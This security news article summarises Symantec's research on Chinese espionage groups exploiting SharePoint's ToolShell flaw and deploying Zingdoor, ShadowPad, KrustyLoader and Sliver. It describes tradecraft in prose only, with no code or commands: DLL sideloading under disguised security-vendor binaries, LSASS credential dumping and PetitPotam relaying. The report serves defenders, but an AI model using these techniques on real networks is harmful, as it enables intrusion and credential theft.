Symantec Exposes Chinese APT Overlap: Zingdoor, ShadowPad, and KrustyLoader Used in Global Espionage

Symantec’s investigation uncovered a complex web of interconnected Chinese espionage operations, with infrastructure and tooling overlapping multiple threat clusters.

The team observed the Zingdoor backdoor, ShadowPad Trojan, and KrustyLoader malware families deployed across victims — all tools previously associated with Glowworm (aka Earth Estries, FamousSparrow) and UNC5221, two Chinese state-linked APT groups.

“Zingdoor, which was deployed on the networks of all three organizations, has in the past been associated with the Chinese group Glowworm,” Symantec noted. “Another tool used in this campaign, KrustyLoader, has also previously been linked to activity by a group called UNC5221, which has been described as a China-nexus group.”

The campaign also saw attackers compromise two South American government agencies and a U.S. university, leveraging SQL Server and Apache HTTP vulnerabilities as alternate entry points. In these cases, they disguised a malicious sideloaded DLL behind a legitimate BugSplat binary named mantec.exe — a tactic to masquerade as Symantec software to evade detection.

The attackers relied on a sophisticated, modular toolkit to maintain persistence and execute commands within target environments.

• Zingdoor Backdoor: A HTTP backdoor written in Go, Zingdoor can collect system data, upload/download files, and execute arbitrary commands. It was first seen in 2023 and has since become a staple of Chinese espionage operations. In this campaign, it was sideloaded using a legitimate Trend Micro binary to blend in with corporate environments.
• ShadowPad Trojan: Deployed alongside Zingdoor, ShadowPad is a modular remote access Trojan (RAT) used by several Chinese APTs including APT41, Blackfly, and Grayfly. It supports DLL sideloading for stealth and can dynamically download new modules to extend its functionality. “ShadowPad is a modular remote access Trojan closely associated with China-based APT groups,” Symantec explained. Its modular nature allows continuous updates with new functionalities, making it a powerful espionage tool.
• KrustyLoader Dropper: On July 25, 2025, attackers deployed KrustyLoader, a Rust-based loader that performs anti-analysis checks and self-deletion, before downloading second-stage payloads — including the Sliver C2 framework. “KrustyLoader was first documented in January 2024,” Symantec stated. “It is written in Rust and designed to deliver a second-stage payload. Its previous activity has been linked to China-based threat actors and the Sliver post-exploitation framework.”

Beyond bespoke malware, the attackers heavily used publicly available and native Windows tools for stealth and persistence, including:

• Certutil – to decode or download files;
• GoGo Scanner – for reconnaissance;
• Revsocks – as a SOCKS5 proxy;
• Procdump, Minidump, and LsassDumper – to dump LSASS memory and extract credentials.

They also executed PetitPotam (CVE-2021-36942) — an LSA spoofing exploit enabling credential theft from Windows domain controllers to escalate privileges.

“PetitPotam is an exploitation technique that allows a threat actor within a compromised network to steal credentials and authentication information from Windows Servers to gain full control of the domain,” Symantec detailed.

The investigation revealed that ToolShell’s exploitation extended far beyond the three groups Microsoft initially identified — Budworm (Linen Typhoon), Sheathminer (Violet Typhoon), and Storm-2603 — indicating an even broader Chinese operational ecosystem.

“These attacks demonstrate that the ToolShell vulnerability was being exploited by an even wider range of Chinese threat actors than was originally thought,” Symantec concluded.

The researchers found evidence of mass scanning for vulnerable SharePoint servers, followed by selective intrusion into targets of strategic interest, suggesting a coordinated espionage campaign aimed at data theft and long-term access.

“The activity carried out on targeted networks indicates that the attackers were interested in stealing credentials and in establishing persistent and stealthy access to victim networks, likely for the purpose of espionage,” the report said.

Related Posts:

• Updated ShadowPad Malware Facilitates Ransomware Deployment in Global Attacks
• Chinese Cyberespionage Groups Probe SentinelOne in Sophisticated ShadowPad and PurpleHaze Campaigns
• Persistent Espionage Attacks on National Infrastructure Raising Alarm
• Symantec Exposes Widespread Mobile App Privacy Risks: Popular Apps Leak Sensitive Data
• Symantec: Many website inserted Cryptocurrency Mining Script